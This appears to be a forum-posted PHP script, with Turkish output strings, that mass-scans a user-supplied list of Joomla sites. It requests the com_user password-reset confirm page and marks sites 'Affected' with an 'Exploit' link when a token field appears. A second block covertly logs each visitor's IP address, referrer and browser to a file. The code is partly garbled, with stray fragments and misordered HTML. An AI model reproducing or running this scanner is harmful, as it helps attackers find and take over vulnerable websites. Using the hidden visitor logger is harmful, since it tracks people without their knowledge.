joomla, token
كود PHP:
height: 498px;
text-align: left;
overflow: auto">
-equiv='pragma' content='no-cache'>
<center>
<?
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
$time = microtime();
$time = explode(" ", $time);
$time = $time[1] + $time[0];
$start = $time;
{
if(isset($_POST['baba']))
{
}
//
{
print_r('
</body>
</html>
<form action="" method="POST"> <br><p><pre><textarea cols=50 rows=10 name=liste>
hackerplumbing.com
</textarea></pre></p> <input type=submit name=baba value=Tara ></form>
');
}
print "<body bgcolor=black text=red>";
$s_list ="sitelerbu.txt";
touch ($s_list);
$bekirac=fopen($s_list,"w+");
fwrite($bekirac,$_POST['liste']);
fclose($bekirac);
$l_arr = @file ($s_list);
if (file_exists($s_list) && !empty ($l_arr)){
foreach ($l_arr as $l_key => $l_val){}
for ($j=0;$j<=$l_key;$j++){
$in_site = "http://".trim($l_arr[$j])."/index.php?option=com_user&view=reset&layout=confirm";
$c = curl_init($in_site);
curl_setopt($c,CURLOPT_RETURNTRANSFER,true);
$l = curl_exec($c);
$fp = fopen("site.txt",w);
fwrite($fp,$l);
$file_array = (file("site.txt"));
foreach ($file_array as $f_key => $f_val){}
$status = "<font color=darkred><b>$l_arr[$j]</b> [Not affected !!]";
$bekoogiac=fopen("x.php",a);
for ($i=0;$i<=$f_key;$i++){
$jo_pattern = trim(htmlspecialchars($file_array[$i]));
if (preg_match("/input\sid\=.*token/",$jo_pattern,$p_arr)){$status="<font color=darkred><b>$l_arr[$j]</b> [Affected !!]: "."<a target='_blank' href=$in_site>Exploit</a>";$i = $f_key;
fwrite($bekoogiac,$status."<br>\n");
}
}
print $status."<font color=darkred><br>";
fclose($bekoogiac);
fclose ($fp);
curl_close($c);
}}else {print "$s_list B?yle Bir Dosya Yok !!";}
}
print "<br><br><br>";
$time = microtime();
$time = explode(" ", $time);
$time = $time[1] + $time[0];
$finish = $time;
$totaltime = ($finish - $start);
printf ("??lem %f Saniyede Tamamland?.", $totaltime);
?>
</center>
<style>
body {
scrollbar-face-color: #000000;
font-size: 10px;
scrollbar-highlight-color: #008000;
scrollbar-shadow-color: #008000;
scrollbar-3dlight-color: #000000;
scrollbar-arrow-color: #000000;
scrollbar-track-color: #000000;
font-family: verdana;
scrollbar-darkshadow-color: #000000;
}
input {
border-top-width: 1px;
font-weight: bold;
border-left-width: 1px;
font-size: 10px;
border-left-color: #008000;
background: black;
border-bottom-width: 1px;
border-bottom-color: #008000;
color: #00ff00;
border-top-color: #008000;
font-family: verdana;
border-right-width: 1px;
border-right-color: #008000;
}
textarea {
border-top-width: 1px;
font-weight: bold;
border-left-width: 1px;
font-size: 10px;
border-left-color: #008000;
background: black;
border-bottom-width: 1px;
border-bottom-color: #008000;
color: #00ff00;
border-top-color: #008000;
font-family: verdana;
border-right-width: 1px;
border-right-color: #008000;
}
p {
font-size: 10px;
font-family: verdana;
}
dl {
font-size: 10px;
font-family: verdana;
}
dt {
font-size: 10px;
font-family: verdana;
}
dd {
font-size: 10px;
font-family: verdana;
}
td {
font-size: 10px;
font-family: verdana;
}
th {
font-size: 10px;
font-family: verdana;
}
.submit {
border-top-width: 1px;
font-weight: bold;
border-left-width: 1px;
font-size: 10px;
border-left-color: #008000;
background: black;
border-bottom-width: 1px;
border-bottom-color: #008000;
color: #00ff00;
border-top-color: #008000;
font-family: verdana;
border-right-width: 1px;
border-right-color: #008000;
}
a:link {
text-decoration: none;
}
a:visited {
text-decoration: none;
}
a:active {
text-decoration: none;
}
a:hover {
color: #00ff00;
text-decoration: none;
}
b.hl1 {
font-weight: bold;
}
b.hl2 {
font-weight: bold;
font-style: italic;
}
.sr {
font-size: 10px;
line-height: 14px;
}
.verify {
padding: 0;
margin: 2px 2px 10px 10px;
vertical-align:middle;
border: 1px solid #008000;
}
.style12 {
font-size: 9px;
color: #00cc00;
}
.style13 {
font-size: 9px;
font-weight: bold;
}
.style14 {
font-size: 9px;
}
.style15 {
font-size: 9px;
color: #d6ef39;
}
.style16 {
font-size: 9px;
}
.main {
background-color: #000000;
text-align: center;
border: thin solid #008000;
}
</style>
<html>
<head></head>
<style>
BODY { SCROLLBAR-BASE-COLOR: #191919; SCROLLBAR-ARROW-COLOR: olive; }
a{color:#dadada;text-decoration:none;font-family:tahoma;font-size:13px}
a:hover{color:olive}
input{FONT-WEIGHT:normal;background-color: #191919;font-size: 12px; color: #dadada; font-family: Tahoma; border: 1px solid #666666;height:17}
textarea{background-color:#191919;color:#dadada;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1 solid #666666;}
div{font-size:12px;font-family:tahoma;font-weight:normal;color:whitesmoke}
select{background-color: #191919; font-size: 12px; color: #dadada; font-family: Tahoma; border: 1 solid #666666;font-weight:bold;}</style>
<body bgcolor=black text=white><font face="sans ms" size=3>
</body>
</html>
<?
if (!$_COOKIE['log'])
{
setcookie("log", "yes");
$ip = $_SERVER['REMOTE_ADDR'];
$ref = $_SERVER['HTTP_REFERER'];
$brow = $_SERVER['HTTP_USER_AGENT'];
$time = date("g:i a M j, y");
$file=fopen("t1kl4m1sm1.html", "a");
#write date
fwrite($file, "<b>Time:</b>$time<br>" );
#write ip if available
if ($ip != null)
{
fwrite($file, "<b>Ip:</B>$ip<br>--------------------------------<br>");
}
}
Joomla token Php joomla